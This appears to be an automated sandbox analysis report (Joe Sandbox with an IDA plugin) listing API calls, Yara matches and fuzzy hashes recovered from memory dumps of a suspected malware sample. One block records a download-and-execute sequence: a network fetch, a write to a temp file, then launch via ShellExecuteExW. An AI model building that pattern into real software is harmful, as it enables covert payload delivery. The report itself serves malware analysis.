• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B09000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b09000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
• GetClientRect.USER32(?,?), ref: 0040214A
• GetDC.USER32(?), ref: 00402151
• CreateSolidBrush.GDI32(00646464), ref: 00402164
• SelectObject.GDI32(00000000,00000000), ref: 00402178
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
• SelectObject.GDI32(00000000,00000000), ref: 00402191
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
• MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
• SelectObject.GDI32(00000000,00000000), ref: 004021EA
• SetBkMode.GDI32(?,00000001), ref: 00402267
• SetTextColor.GDI32(?,00000000), ref: 00402276
• _wcslen.LIBCMT ref: 0040227F
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
• String ID: Tahoma
• API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 004025F2
                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00402619
                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                                                                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00402754
                                                                                                                                                                                                                                            • SetCapture.USER32(?), ref: 004027A1
                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 004027D5
                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                                                                                                                                                            • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                                            • String ID: gya
                                                                                                                                                                                                                                            • API String ID: 2545303185-1989253062
                                                                                                                                                                                                                                            • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                            • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$Info
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2509303402-0
                                                                                                                                                                                                                                            • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                            • Instruction ID: 7470ea8a20f3ebfb693555afe86e06abf961ee06afc84aeba07f5b0c9472dc93
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1B1AE71A002099FDB62DF69C880BEFBBF5BF49304F64416EE499A7341DB75A841CB60
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$Info
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2509303402-0
                                                                                                                                                                                                                                            • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                            • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 024CA8A3
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C0F
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C21
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C33
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C45
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C57
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C69
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C7B
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C8D
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C9F
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CB1
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CC3
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CD5
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CE7
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA898
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA8BA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA8CF
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA8DA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA8FC
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA90F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA91D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA928
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA960
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA967
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA984
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA99C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                                                                            • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
• Instruction ID: 4172addc0a296edae16ff608617903e37be4f25d1e727db2fdbd0689dff5eb02
• Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
• Instruction Fuzzy Hash: 90318A396042189BEBB4AF3ED840B5BB7E9AF00754F31886FE449D6650DB70A8508BA4
APIs
• ___free_lconv_mon.LIBCMT ref: 0043A63C
  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
• _free.LIBCMT ref: 0043A631
  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
• _free.LIBCMT ref: 0043A653
• _free.LIBCMT ref: 0043A668
• _free.LIBCMT ref: 0043A673
• _free.LIBCMT ref: 0043A695
• _free.LIBCMT ref: 0043A6A8
• _free.LIBCMT ref: 0043A6B6
• _free.LIBCMT ref: 0043A6C1
• _free.LIBCMT ref: 0043A6F9
• _free.LIBCMT ref: 0043A700
• _free.LIBCMT ref: 0043A71D
• _free.LIBCMT ref: 0043A735
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
• Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
• Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
• Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
APIs
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
• Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
• Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
• Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
APIs
• InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02492C7E
• InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02492C94
• GetTempPathW.KERNEL32(00000105,?), ref: 02492CB0
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02492CC6
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02492CFF
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02492D3B
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02492D58
• ShellExecuteExW.SHELL32(?), ref: 02492DCF
• WaitForSingleObject.KERNEL32(?,00008000), ref: 02492DE4
Strings
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
• String ID: <
• API String ID: 838076374-4251816714
• Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
• Instruction ID: 87599a9e4dd94e7c45227a6dc8abfde4c5174a8f5a71db35cd1dcf5b97c66825
• Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
• Instruction Fuzzy Hash: 9F41407194021DAEEB20DF649C85FEA7BBCFF05745F0081EAA545E2150DFB09E858FA4
APIs
• LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024AF228,00000004,024A7D87,00000004,024A8069), ref: 024AEEF9
• GetLastError.KERNEL32(?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000,?), ref: 024AEF05
• LoadLibraryW.KERNEL32(advapi32.dll,?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000), ref: 024AEF15
• GetProcAddress.KERNEL32(00000000,00447430), ref: 024AEF2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF41
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF58
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF6F
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF86
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF9D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$ErrorLast
• String ID: advapi32.dll
• API String ID: 2340687224-4050573280
• Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
• Instruction ID: 5094c6e2bcea075d3313d2a7846d9035d3d1bbbe03e89dfc1d5aca356291f4ab
• Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
• Instruction Fuzzy Hash: A72181B1904711BFE7106FB49C08A5ABFA8EF19B16F004A2BF556E3600CBBC94418FA4
                                                                                                                                                                                                                                            • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                            • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                            • Instruction ID: 67b99fa2203f2466764ca8cb5f16755750311b1da076590b33f09902df0306e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 172192B1904711BFE7106F749C08A5ABFECEF09B16F004A2BF556D3600CBBC94418BA8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024A670B), ref: 024A24B6
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024A24C4
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024A24D2
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024A670B), ref: 024A2500
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 024A2507
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A2522
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A252E
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2544
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2552
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                            • String ID: kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                            • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                            • Instruction ID: fb198a6187ad5218e4a28ca95cd2a7646b6af406393cbf0691321f886d3eb6d4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5611E5799003117FE711BB756C79A6B3BECAE15B12720052BFC02E3291EBB8D5009A6C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                                                                                                                                                                                              • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                            • String ID: pContext$switchState
                                                                                                                                                                                                                                            • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                                            • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                            • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                                                                                                                                                            • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                                                                                                                                                              • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                                                                                                                                                              • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004197B9
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: eventObject
                                                                                                                                                                                                                                            • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                            • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                            • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 024B0C36
                                                                                                                                                                                                                                            • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024B0C9D
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024B0CBA
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024B0D20
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024B0D35
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024B0D47
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024B0D75
                                                                                                                                                                                                                                            • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024B0D80
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024B0DAC
                                                                                                                                                                                                                                            • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024B0DBC
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
• API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
• String ID:
• API String ID: 3720063390-0
• Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
• Instruction ID: 786d573ca87ffe611f688709f5500a60eecc739d42592a39fd8531b607247f3d
• Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
• Instruction Fuzzy Hash: 6741B330A042449BCF1AFFA5C4A47EE7BA6AF15305F0450AFD8095B3C2DB659A0ACF71
APIs
• _free.LIBCMT ref: 024C2061
  • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
  • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
• _free.LIBCMT ref: 024C206D
• _free.LIBCMT ref: 024C2078
• _free.LIBCMT ref: 024C2083
• _free.LIBCMT ref: 024C208E
• _free.LIBCMT ref: 024C2099
• _free.LIBCMT ref: 024C20A4
• _free.LIBCMT ref: 024C20AF
• _free.LIBCMT ref: 024C20BA
• _free.LIBCMT ref: 024C20C8
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
• Instruction ID: 0f68bc051604a93f9ce8e542ecc60d661016fa722728ebdc5245b7f71ea2c3c4
• Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
• Instruction Fuzzy Hash: 09114779710108AFCB91FF5AC941DD93FA6EF04750B6181AABA094F261D771EE609F80
APIs
• _free.LIBCMT ref: 00431DFA
